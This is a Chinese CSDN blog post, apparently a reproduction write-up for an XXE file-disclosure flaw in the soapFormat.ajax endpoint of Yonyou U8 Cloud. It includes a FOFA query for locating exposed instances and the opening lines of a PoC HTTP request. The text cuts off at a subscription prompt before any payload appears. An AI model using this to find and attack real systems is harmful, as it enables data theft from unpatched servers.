用友U8 Cloud soapFormat XXE漏洞复现

0xSecl

已于 2023-12-27 21:53:48 修改

阅读量859

点赞数 9

分类专栏：漏洞复现文章标签：安全 web安全

于 2023-12-27 21:48:51 首次发布

本文链接：https://blog.csdn.net/qq_41904294/article/details/135256289

版权

910 篇文章 1488 订阅 ¥9.90 ¥99.00

订阅专栏

本文介绍了用友U8 Cloud的soapFormat.ajax接口存在的XXE漏洞，详细阐述了漏洞概述、影响范围及复现过程，并提供了修复建议和补丁获取链接。

摘要由CSDN通过智能技术生成

用友U8 Cloud 提供企业级云ERP整体解决方案，全面支持多组织业务协同，实现企业互联网资源连接。 U8 Cloud 亦是亚太地区成长型企业最广泛采用的云解决方案。

用友U8 Cloud soapFormat.ajax接口处存在 XXE漏洞，攻击者可通过该漏洞获取敏感文件信息，攻击者添加恶意内容，通过易受攻击的代码，就能够攻击包含缺陷的XML处理器。

所有版本

FOFA：app="用友-U8-Cloud"

PoC

POST /uapws/soapFormat.ajax HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101

了解本专栏

关注

专栏目录